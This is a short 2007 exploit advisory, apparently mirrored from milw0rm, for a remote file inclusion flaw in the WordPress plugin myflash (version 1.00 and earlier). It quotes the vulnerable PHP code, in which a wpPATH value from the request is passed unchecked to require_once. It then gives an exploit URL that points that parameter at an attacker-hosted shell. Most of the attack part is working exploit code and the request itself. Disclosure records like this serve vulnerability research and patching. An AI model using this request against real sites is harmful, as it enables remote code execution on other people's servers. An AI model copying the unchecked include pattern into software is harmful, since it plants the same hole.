Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability

2007-05-02T00:00:00
ID SECURITYVULNS:DOC:16913
Type securityvulns
Reporter Securityvulns
Modified 2007-05-02T00:00:00

Description

--------------------------------- [ Oyle Kahpe Ki Dünya ! ] --------------------------------------

Title : Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability


Author: Crackers_Child

cont@ct: cybermilitan@hotmail.com



Application : Wordpress plugin

Web Site : http://alexrabe.boelinger.com/


Vuln İn myflash-button.php

if (!$_POST) $wppath=$_GET['wpPATH']; else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php'); require_once($wppath.'/wp-admin/admin.php');

global $wpdb;

Exploit:

http://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?


greets:

Every Body


--------------------------------- [http://www.biyosecurity.net ] --------------------------------------

milw0rm.com [2007-05-01]